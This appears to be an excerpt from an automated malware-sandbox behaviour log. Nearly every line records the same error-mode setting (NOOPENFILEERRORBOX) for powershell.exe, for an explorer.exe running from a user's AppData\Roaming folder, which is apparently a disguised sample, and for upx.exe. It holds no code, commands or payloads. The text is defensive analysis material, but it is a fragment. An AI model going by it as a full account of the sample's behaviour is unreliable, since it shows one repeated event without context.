                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
